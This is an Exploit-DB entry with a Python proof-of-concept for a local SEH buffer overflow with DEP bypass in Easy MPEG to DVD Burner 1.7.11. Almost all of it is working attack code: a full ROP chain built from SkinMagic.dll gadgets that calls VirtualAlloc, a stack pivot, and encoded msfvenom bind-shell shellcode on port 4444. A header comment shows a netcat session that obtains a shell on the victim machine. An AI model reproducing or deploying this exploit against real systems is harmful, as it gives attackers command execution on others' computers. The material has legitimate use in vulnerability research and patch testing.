Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) (DEP Bypass)

EDB-ID:

44658

CVE:

N/A


Platform:

Windows

Published:

2018-05-20

#!/usr/bin/python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass Local Buffer Overflow                                                     #
# Date: 2018-05-19                                                                                                                   #
# Author: Juan Prescotto                                                                                                             #
# Tested Against: Win7 Pro SP1 64 bit                                                                                                #
# Software Download #1: https://downloads.tomsguide.com/MPEG-Easy-Burner,0301-10418.html                                             #
# Software Download #2: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe                        #
# Version: 1.7.11                                                                                                                    #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine                                            #
# Credit: Thanks to Marwan Shamel (https://www.exploit-db.com/exploits/44565/) for his work on the original SEH exploit              #
# Steps : Open the APP > click on register > Username field > paste in contents from the .txt file that was generated by this script #
#------------------------------------------------------------------------------------------------------------------------------------#
# Bad Characers: \x00\x0a\x0d                                                                                                        #
# SEH Offset: 1012                                                                                                                   #
# Non-Participating Modules: SkinMagic.dll & Easy MPEG to DVD Burner.exe                                                             #
#------------------------------------------------------------------------------------------------------------------------------------#
# root@kali:~/Desktop# nc -nv 10.0.1.14 4444                                                                                         #
# (UNKNOWN) [10.0.1.14] 4444 (?) open                                                                                                #
# Microsoft Windows [Version 6.1.7601]                                                                                               #
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.                                                                     #
#                                                                                                                                    #
# C:\Program Files (x86)\Easy MPEG to DVD Burner>                                                                                    #
#------------------------------------------------------------------------------------------------------------------------------------#

# My register setup when VirtualAlloc() is called (Defeat DEP) :
#--------------------------------------------
# EAX = Points to PUSHAD at time VirtualAlloc() is called (Stack Pivot jumps over it on return)
# ECX = flProtect (0x40)
# EDX = flAllocationType (0x1000)
# EBX = dwSize (0x01)
# ESP = lpAddress (automatic)
# EBP = ReturnTo (stack pivot into a rop nop / jmp esp)
# ESI = ptr to VirtualAlloc()
# EDI = ROP NOP (RETN)

import struct

def create_rop_chain():

    rop_gadgets = [
      #***START VirtualAlloc() to ESI***
      0x10027e6b,  # POP EAX # RETN [SkinMagic.dll] ** 
      0x1003b1d4,  # ptr to &VirtualAlloc() [IAT SkinMagic.dll]
      0x100369a1,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [SkinMagic.dll] 
      0x10032993,  # POP EBX # RETN [SkinMagic.dll] 
      0xffffffff,  #  
      0x10037bd3,  # INC EBX # FPATAN # RETN [SkinMagic.dll]
      0x10037bd3,  # INC EBX # FPATAN # RETN [SkinMagic.dll]
      0x10037bc0,  # POP EDX # RETN [SkinMagic.dll]
      0xffffffff,  #
      0x10035a07,  # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN [SkinMagic.dll]
      0x10037654,  # POP EAX # RETN [SkinMagic.dll] 
      0xa141dffb,  # 
      0x100317c8,  # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
      0x1003248d,  # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
      0x41414141,  # FILLER
      0x1003993e,  # PUSH EDX # ADD AL,5F # POP ESI # POP EBX # RETN 0x0C [SkinMagic.dll]
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      #***END VirtualAlloc() to ESI***

      #***START 0x40 to ECX***
      0x100185fb,  # XOR EAX,EAX # RETN [SkinMagic.dll]
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      0x41414141,  # FILLER  
      0x10037c5b,  # ADD EAX,40 # POP EBP # RETN [SkinMagic.dll]
      0x41414141,  # FILLER
      0x10032176,  # XCHG EAX,ECX # ADD EAX,20835910 # ADD BYTE PTR DS:[ECX+10059130],AH # MOV DWORD PTR DS:[1005912C],EAX # RETN [SkinMagic.dll]
      #***END 0x40 to ECX***

      #***START 0x1000 to EDX***
      0x10032993,  # POP EBX # RETN [SkinMagic.dll] 
      0xaaaaaaaa,  #
      0x10037bc0,  # POP EDX # RETN [SkinMagic.dll]
      0x55556556,  #
      0x10037654,  # POP EAX # RETN [SkinMagic.dll] 
      0xa141dffb,  # 
      0x100317c8,  # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] Gets us to #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
      0x1003248d,  # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x0041a87e # ADD EDX,EBX # POP EBX # RETN 0x10 [Easy MPEG to DVD Burner.exe]
      0x41414141,  # FILLER
      #***END 0x1000 to EDX***

      #*** Start EBP = ReturnTo (stack pivot into a rop nop / jmp esp)***
      0x1002829d,  # POP EBP # RETN [SkinMagic.dll]
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      0x41414141,  # FILLER
      0x100284f8,  # {pivot 16 / 0x10} :  # ADD ESP,0C # POP EBP # RETN [SkinMagic.dll]
      #*** END EBP = ReturnTo (stack pivot into a rop nop / jmp esp)***

      #***START 0x1 to EBX***
      0x10032993,  # POP EBX # RETN [SkinMagic.dll] 
      0xffffffff,  #  
      0x10037bd3,  # INC EBX # FPATAN # RETN [SkinMagic.dll] 
      0x10037bd3,  # INC EBX # FPATAN # RETN [SkinMagic.dll]
      #***END 0x1 to EBX***

      #***START ROP NOP to EDI***
      0x100342f0,  # POP EDI # RETN [SkinMagic.dll] 
      0x10032158,  # RETN (ROP NOP) [SkinMagic.dll]
      #***END ROP NOP to EDI***

      #***START Gadgets to execute PUSHAD / Execute VirtualAlloc()***
      0x10037654,  # POP EAX # RETN [SkinMagic.dll] 
      0xa140acd2,  # CONSTANT
      0x100317c8,  # ADD EAX,5EFFC883 # RETN [SkinMagic.dll] (Puts location of a PUSHAD into EAX "0x00407555",   # PUSHAD # RETN [Easy MPEG to DVD Burner.exe]
      0x1003248d,  # PUSH EAX # RETN [SkinMagic.dll] | Calls #0x00407555,   # PUSHAD # RETN [Easy MPEG to DVD Burner.exe]
      #***END Gadgets to execute PUSHAD***

      #***After Return from VirtualAlloc() / stack pivot land in ROP NOP Sled / jmp ESP --> Execute Shellcode***
      0x10032158,  # RETN (ROP NOP) [SkinMagic.dll]
      0x10032158,  # RETN (ROP NOP) [SkinMagic.dll]
      0x10032158,  # RETN (ROP NOP) [SkinMagic.dll]
      0x10032158,  # RETN (ROP NOP) [SkinMagic.dll]
      0x1001cc57,  # & push esp # ret  [SkinMagic.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

nop_rop_chain_1 = "\xbd\xdd\x02\x10" * 18 # 0x1002ddbd : {pivot 12 / 0x0c} :  # ADD ESP,0C # RETN [SkinMagic.dll]
nop_rop_chain_2 = "\x58\x21\x03\x10" * 22 # RETN (ROP NOP) [SkinMagic.dll]
seh = "\x06\x4e\x40" # 0x00404e06 : {stack pivot 1928 / 0x788} (Lands us into rop nop chain --> rop_chain) :  # POP EDI # POP ESI # POP EBP # MOV DWORD PTR FS:[0],ECX # POP EBX # ADD ESP,778 # RETN [Easy MPEG to DVD Burner.exe]
nop = "\x90" * 20

#Max Space Avaliable for Shellcode = 600 bytes
#------------------------------------------------------------------------------------#
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x0a\x0d' -f py -v shellcode #
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)                           #
#------------------------------------------------------------------------------------#
shellcode =  ""
shellcode += "\xb8\x50\x08\x0f\xf2\xd9\xe9\xd9\x74\x24\xf4\x5b"
shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\x93"
shellcode += "\x0c\xed\x07\xef\xe5\x73\xe7\x0f\xf6\x13\x61\xea"
shellcode += "\xc7\x13\x15\x7f\x77\xa4\x5d\x2d\x74\x4f\x33\xc5"
shellcode += "\x0f\x3d\x9c\xea\xb8\x88\xfa\xc5\x39\xa0\x3f\x44"
shellcode += "\xba\xbb\x13\xa6\x83\x73\x66\xa7\xc4\x6e\x8b\xf5"
shellcode += "\x9d\xe5\x3e\xe9\xaa\xb0\x82\x82\xe1\x55\x83\x77"
shellcode += "\xb1\x54\xa2\x26\xc9\x0e\x64\xc9\x1e\x3b\x2d\xd1"
shellcode += "\x43\x06\xe7\x6a\xb7\xfc\xf6\xba\x89\xfd\x55\x83"
shellcode += "\x25\x0c\xa7\xc4\x82\xef\xd2\x3c\xf1\x92\xe4\xfb"
shellcode += "\x8b\x48\x60\x1f\x2b\x1a\xd2\xfb\xcd\xcf\x85\x88"
shellcode += "\xc2\xa4\xc2\xd6\xc6\x3b\x06\x6d\xf2\xb0\xa9\xa1"
shellcode += "\x72\x82\x8d\x65\xde\x50\xaf\x3c\xba\x37\xd0\x5e"
shellcode += "\x65\xe7\x74\x15\x88\xfc\x04\x74\xc5\x31\x25\x86"
shellcode += "\x15\x5e\x3e\xf5\x27\xc1\x94\x91\x0b\x8a\x32\x66"
shellcode += "\x6b\xa1\x83\xf8\x92\x4a\xf4\xd1\x50\x1e\xa4\x49"
shellcode += "\x70\x1f\x2f\x89\x7d\xca\xda\x81\xd8\xa5\xf8\x6c"
shellcode += "\x9a\x15\xbd\xde\x73\x7c\x32\x01\x63\x7f\x98\x2a"
shellcode += "\x0c\x82\x23\x45\x91\x0b\xc5\x0f\x39\x5a\x5d\xa7"
shellcode += "\xfb\xb9\x56\x50\x03\xe8\xce\xf6\x4c\xfa\xc9\xf9"
shellcode += "\x4c\x28\x7e\x6d\xc7\x3f\xba\x8c\xd8\x15\xea\xd9"
shellcode += "\x4f\xe3\x7b\xa8\xee\xf4\x51\x5a\x92\x67\x3e\x9a"
shellcode += "\xdd\x9b\xe9\xcd\x8a\x6a\xe0\x9b\x26\xd4\x5a\xb9"
shellcode += "\xba\x80\xa5\x79\x61\x71\x2b\x80\xe4\xcd\x0f\x92"
shellcode += "\x30\xcd\x0b\xc6\xec\x98\xc5\xb0\x4a\x73\xa4\x6a"
shellcode += "\x05\x28\x6e\xfa\xd0\x02\xb1\x7c\xdd\x4e\x47\x60"
shellcode += "\x6c\x27\x1e\x9f\x41\xaf\x96\xd8\xbf\x4f\x58\x33"
shellcode += "\x04\x7f\x13\x19\x2d\xe8\xfa\xc8\x6f\x75\xfd\x27"
shellcode += "\xb3\x80\x7e\xcd\x4c\x77\x9e\xa4\x49\x33\x18\x55"
shellcode += "\x20\x2c\xcd\x59\x97\x4d\xc4"

exploit = nop_rop_chain_1 + nop_rop_chain_2 + rop_chain + nop + shellcode + "\x41" * (1012-len(nop_rop_chain_1)-len(nop_rop_chain_2)-len(rop_chain)-len(nop)-len(shellcode)) + seh

f = open ("Exploit.txt", "w")
f.write(exploit)
f.close()